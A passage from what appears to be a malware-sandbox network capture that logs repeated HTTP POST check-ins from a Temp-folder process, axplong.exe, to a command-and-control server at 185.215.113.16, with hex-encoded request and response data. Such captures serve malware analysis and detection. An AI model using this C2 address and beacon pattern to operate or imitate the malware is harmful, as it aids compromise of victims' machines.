                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:53.051939964 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:53.053421021 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:53.279089928 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  45 | 192.168.2.4 | 49782 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:53.398593903 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:54.116070032 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:54.120922089 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:54.350178003 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  46 | 192.168.2.4 | 49783 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:54.488132000 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:55.186835051 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:55.188698053 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:55.412720919 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  47 | 192.168.2.4 | 49784 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:55.522983074 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:56.213176966 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:56.214174986 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:56.437378883 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  48 | 192.168.2.4 | 49785 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:56.556488991 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:57.289028883 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:57.289908886 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:57.528932095 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  49 | 192.168.2.4 | 49786 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:57.650799036 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:58.363142014 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:58.365860939 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:58.592608929 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  50 | 192.168.2.4 | 49787 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:58.710846901 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:59.428801060 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:59.430684090 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:59.664016008 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  51 | 192.168.2.4 | 49788 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:59.773771048 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:00.618294001 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:54:00.621315956 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:00.930186987 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  52 | 192.168.2.4 | 49789 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:01.038297892 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:01.728437901 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:54:01.729393959 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:02.052531004 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  53 | 192.168.2.4 | 49790 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:02.165822983 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:02.879602909 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:54:02.880328894 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:03.111944914 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  54 | 192.168.2.4 | 49791 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:03.241442919 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:03.946463108 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  55 | 192.168.2.4 | 49792 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:03.956876040 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:54:04.670373917 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  56 | 192.168.2.4 | 49793 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:04.790996075 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:54:05.507045031 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:54:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  57 | 192.168.2.4 | 49794 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:54:05.516211033 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
